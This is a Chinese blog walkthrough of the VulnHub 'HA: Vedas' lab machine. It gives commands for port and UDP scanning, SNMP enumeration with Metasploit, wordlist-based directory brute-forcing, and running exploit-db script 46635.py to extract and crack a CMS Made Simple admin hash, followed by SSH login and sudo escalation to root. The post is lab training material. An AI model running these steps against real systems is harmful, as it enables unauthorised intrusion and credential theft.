vulnhub 之 vedas

最新推荐文章于 2023-07-15 23:59:28 发布
最新推荐文章于 2023-07-15 23:59:28 发布
阅读量414 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/119724740
版权

目录

信息搜集

扫描网段确定真实IP地址

扫描IP地址确定开放端口以及服务

 浏览器查看web网站

扫描网站目录

使用dirb扫

扫描udp服务

发现漏洞

获取第一个flag

使用msf工具搜索snmp利用模块

 获取第二个flag

爬取网站信息作为扫描网站目录的字典扫描该网站目录

 访问扫描出的网站目录

Whatweb

 searchsploit

 使用漏洞利用脚本得到第二个flag

 获取第三个flag

登录ssh

查看各种文件最终找到第三个flag

提权

将之前的到的3个flag中的way to root组合起来

 将该结果作为vedas的密码登录

尝试提权到root

 总结

参考文章

信息搜集

 

扫描网段确定真实IP地址

扫描IP地址确定开放端口以及服务

 浏览器查看web网站

好像就是一个普普通通的网站,甚至都没有什么功能点,有个搜索键还是假的。所以再web方面并没有发现什么有用的信息

扫描网站目录

dirsearch -u http://192.168.179.164

 几乎等同于没有收获,我一开始还去访问了/images/目录发现12345689都有就是没有7,我还以为隐藏起来了,结果并没有就是不存在,还尝试过去找图片内的信息(隐写相关)都以失败告终。

使用dirb扫

dirb http://192.168.179.164

结果几乎是一样的

扫描udp服务

看样子http这边是行不通了,当时在我看来就只剩ssh服务了,ssh在中间件没有问题的情况下只能是暴力破解,于是从网站页面爬了个字典,用户名和密码一起跑。欸  也没跑出来。麻了  兄弟们。

开启偷瞄,发现是udp的服务,唉  ,也不难就是一个思路问题,我咋就没想到呢,之前也不是没碰见过,长记性下次再没思路记得一定试试udp

nmap -sU 192.168.179.164

 

发现漏洞

获取第一个flag

使用msf工具搜索snmp利用模块

msfconsole
search snmp
use  auxiliary/scanner/snmp/snmp_enum
show options
set rhost   192.168.179.164
run
####
获取到第一个flag:
Way to Root:1 (0e462097431)
Rig Veda: {0e87105d070afcb11c7264cc13f2e86b}

 该模块的作用是获取到community,如果有可读权限,可以使用这个模块读取系统信息

 获取第二个flag

爬取网站信息作为扫描网站目录的字典扫描该网站目录

cewl  http://192.168.179.164/  > /tmp/user.txt
cd /tmp
dirb http://192.168.179.164 user.txt

 

 访问扫描出的网站目录

 看这个网站主页也很明白了,就跟cms相关的呗,simple但是没有具体的版本号,还是要搞到版本号才好有针对性的下手

Whatweb

whatweb是一款开源的网站指纹识别软件,同时也是集成在kali上了所以用起来也很方便,Whatweb可识别的web技术,包括内容管理系统(CMS),博客平台,统计/分析包,Javascript库,服务器和嵌入式设备。使用教程

whatweb http://192.168.179.164/Kashyapa/

 searchsploit

searchsploit  CMS Made Simple 2.2.8

 使用漏洞利用脚本得到第二个flag

locate php/webapps/46635.py
scp /usr/share/exploitdb/exploits/php/webapps/46635.py  /tmp
python 46635.py -u http://192.168.179.164/Kashyapa/ --crack -w user.txt

提示报错缺少termcolor模块,去官网下载并解压导入

tar -zxvf termcolor-1.1.0.tar.gz
cd termcolor-1.1.0
python setup.py install
python 46635.py -u http://192.168.179.164/Kashyapa/ --crack -w user.txt
#####

[+] Salt for password found: 65bd8602d290b16d
[+] Username found: atri
[+] Email found: abcd@gmail.com
[+] Password found: 49ba135760e8265758ae48ef5c7338c7
[+] Password cracked: anasuya

 扫描二级目录

dirsearch -u http://192.168.179.164/Kashyapa/

 还是有很多信息的,我们这边就不一一查看了。因为的得到了一个用户名和密码所以我们这边直接找登录页面

http://192.168.179.164/Kashyapa/admin/login.php

使用我们之前得到的用户名和密码进行登录

用户名:atri
密码:anasuya
####
登录后在后台找到flag
Yagur Veda: {81b44a402a34a850dfcf1e277a18234d}

Way to Root:2 (906509019)

 获取第三个flag

登录ssh

除了网站后台还有一个可用于登录的地方,那就是ssh(我可一直记着你呢)

ssh atri@192.168.179.164
anasuya

查看各种文件最终找到第三个flag

cd /opt/
ls -al
cd test/
ls -al
cat index.html
######
Sama Veda: {c9a9aeb104157fb92f781714d010099c}
Way to Root:3 (562988736854)

提权

我们在翻看各种文件的时候发现家目录下还有一个用户

 一般来说按照出题人的套路一般都是一个用户下一个flag,所以我们应该要想办法切换到vedas用户中去

将之前的到的3个flag中的way to root组合起来

得到

得到:0e462097431906509019562988736854
md5解密:240610708

 将该结果作为vedas的密码登录

su vedas
240610708

 该用户家目录下并没有flag,尝试进入root目录

失败

尝试提权到root

 

sudo -l
sudo su
cd /root
cat final.txt

 总结

这个靶机总的来说难度不是很高,对我来说就是有些思路想不到,这种靶机应该就更类似CTF一样,所以还是要多做题培养自己的解题思路。比如说一开始扫描udp服务,你说这种知识点难嘛,也不难,但是我就是没想到,还有一个就是最后把3个flag组合起来然后解密是我没想到的。相比之下我更喜欢前面的那两个靶机,总感觉出题的痕迹特别明显然后有些题解着特别牵强。

参考文章

https://www.cnblogs.com/gaonuoqi/p/14958209.html
https://www.hackingarticles.in/ha-vedas-vulnhub-walkthrough/

鲨鱼辣椒k
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
liver100day的博客
05-15 412
渗透测试实战–BSides-Vancouver-2018-Workshop 靶机下载/安装 靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/ 靶机IP地址:未知 kali渗透机地址:192.168.75.128 1.主机发现
vedas:10可视化由电力发布的供需绩效数据的应用程序
05-08
昵称=吠陀经由于要按原样读取存储库名称很长,因此就像从背面读取单词的第一个字母一样。 供需能源查看器S <= A <= D <= E <= V 昵称=吠陀经Vdas似乎有一个按原样使用的系统,因此我放置了“ Energy”来...
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 640
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
vulnhub--Vikings: 1
weixin_46107179的博客
04-26 287
靶机下载地址:下载链接 主机发现 通过arp-scan -l发现主机 信息搜集 通过nmap收集ip地址信息(开放22,80端口) 进行访问80端口,发现有一个site目录,进一步访问发现主页面只有一些简单介绍,访问时,访问速度很慢,查看源代码才知道,去访问了一些谷歌等的资源,所以访问页面比较慢 然后扫描目录,发现该目录下有一个war.txt文件 访问war.txt发现这是一个路径 访问该路径,发现是通过base64加密的 下载下来并查看文件类型发现是zip类型 发现解压需要密码 用john
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
最新发布
qq_61702710的博客
07-15 2183
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
vulnhub:inferno-1.1
鲨鱼辣椒的博客
08-25 1241
目录 信息搜集 扫描网段确定真实IP地址 扫描IP地址确定开放端口以及服务 浏览器查看web站点 扫描网站目录 发现站点入口 发现漏洞 暴力破解登录页面 ​ 登录后台 getshell 搜索管理平台名找到利用脚本 最终确定49705.py为exp 提权 发现隐藏文件 ​hex解密隐藏文件得到一组用户密码 ssh登录该用户并得到第一个flag 提升至root权限 查询该提权命令的利用方法 首先将要设置的密码转换为sha-512 写入r...
UFW-Tirukkural「திருக்குறள் - Tirukkural」-crx插件
03-08
Tirukkural是泰米尔语中最重要的作品之一。 这在其他一些名字中也得到了体现,例如泰米尔语(Tamil marai)(泰米尔语吠陀(Tamil Vedas))。 poyyamozhi(永不失败的单词); 和Deiva Nool(神圣文本),该作品的...
sistema-de-prestamo
04-06
Puede gestionarbóvedas,rutas de cobro,特工,主管,cierres de ruta,históricode pagos,estadísticade agente,gastos报到,perfil de cliente,entre otras cosas。 版本演示 Los datos se borran ...
Vulnhub】Litterally
4ut15m's blog
01-23 811
Litterally_WriteUp@4ut15m 信息搜集 使用nmap 扫描存活主机 nmap -sP 192.168.0.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-23 20:27 CST Nmap scan report for 192.168.0.1 Host is up (0.0059s latency)....
HA: VEDAS靶机
小小猪的博客
09-19 624
home目录下面还存在一个vedas用户,进行切换,并获得root权限。最终在/opt/test目录下面查看到第三个flag。nmap进行端口和服务扫描,发现80以及22端口。nmap探测udp服务,发现一个snmp服务。目录进行爆破,并无找到可以利用方式。查看到第一个flag,以及一段字符。查看root目录,发现第四个flag。将所得的字符进行拼接,发现是md5。查看该服务的漏洞利用方式。查看该文件使用方法以及内容。查看该cms的历史漏洞。进行爆破,需要安装模块。发现网页,是个cms。
CVE-2017-8912 CMS Made Simple命令执行
whatiwhere的博客
05-06 754
CVE-2017-8912 CMS Made Simple命令执行 1)了解命令执行漏洞,并且能够从源码中发现。 2)用eval处理函数,并且过滤不严导致命令执行。 实验步骤 1.1)登录网站 1.2)进入admin后台弱口令登入 1.3)找到能够添加的地址 1.4)点击submit提交后 点击设置项 1.5)点击run后可以看到命令被执行当前中间件的权限是sy...
Vulnhub_hacksudo_fog
qq_45434762的博客
05-22 765
主机信息kali: 192.168.1.11 hacksudo_fog: 192.1.12 信息收集使用nmap扫描目标主机IP发现开放以下端口nmap -T4 -A -v -p- 19...
vulnhub靶场,vedas
kukudeshuo的博客
08-31 425
vulnhub靶场,vedas 环境准备 靶机下载地址:https://www.vulnhub.com/entry/ha-vedas,587/ 攻击机:kali(192.168.109.128) 靶机vedas(192.168.109.173) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 查看一下官方说明 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.173 使用nmap扫描查看目标靶机
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4417
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
vlunhub之potato
鲨鱼辣椒的博客
05-31 2552
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 发现漏洞 尝试爆破 登录 提权 查看内核版本找到合适的poc 信息搜集 扫描网段 nmap -sP 192.168.179.0/24 扫描端口 nmap -sS -sV -p- -v 192.168.179.129 扫描网站目录 dirb http://192.168.179.129/ 发现漏洞 挨个进这几个页面去看一看,只知道一个phpinfo界面,找到一个算是敏感信息泄露的漏洞,其他的就没有什么.
vlunhub之Nagini(详细过程)
鲨鱼辣椒的博客
06-02 2008
horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}
vulnhub之Durian复现过程
鲨鱼辣椒的博客
06-30 1871
这个靶场还是有些难度的,我之前就试过一次了,卡在一个地方很久后面实在没办法就先放弃了。这两天学习过程中我感觉我好像突然又悟了,所以又把它掏出来,准备今天就拿下它。必拿下! 信息搜集 还是老样子三板斧 扫描网段 目的找到网站的真实IP地址,如果是在真实环境中这一步应该是绕过CDN,或者是搜集一些子域名、旁站c段等一些信息 扫描端口以及开启的各种服务 基本上就扫出来这几个端口和服务,然后8088这个端口的服务是radan—http,我之前没见过就去搜了一下:端口本身(8088)最初注册到
vulnhub之sherlock
鲨鱼辣椒的博客
08-12 1161
靶机下载地址:https://www.vulnhub.com/entry/ha-sherlock,580/ 信息搜集 扫描网段获取真实IP地址 扫描IP地址获取服务以及开放端口信息 可以看到有好几个服务都是与邮件有关的一些协议,那么相信重头戏就是与邮件相关了 浏览器查看网站 在浏览整个网页之后,我想我大概明白我们要干什么了,应该是帮助夏洛克先生找到这次案件的真实凶手(神探夏洛克巨好看),案件大概就是有一位先生在他的公寓中遇害了,我们需要做的就是根据这位先生在他的电脑中留下来的线索找到凶.
vulnhub之CengBox3
鲨鱼辣椒的博客
08-08 821
信息搜集 扫描网段
vulnhub之Monitoring(完整复现过程)
鲨鱼辣椒的博客
06-15 671
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 查看网页 找到漏洞 看到登录页面尝试爆破 爆破出密码,尝试登录后台 getshell 后台行不通,还是回到搭建平台上 找到一个版本对应的脚本 getshell失败,扩大搜索范围。尝试多个脚本 找到正确脚本,设置选项 getshell 顺利拿到flag 信息搜集 扫描网段 扫描端口 nmap -A -P- 192.168.179.140 扫描网站目录 mul 目录没有扫出什么有价值的东西。 查看网页.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值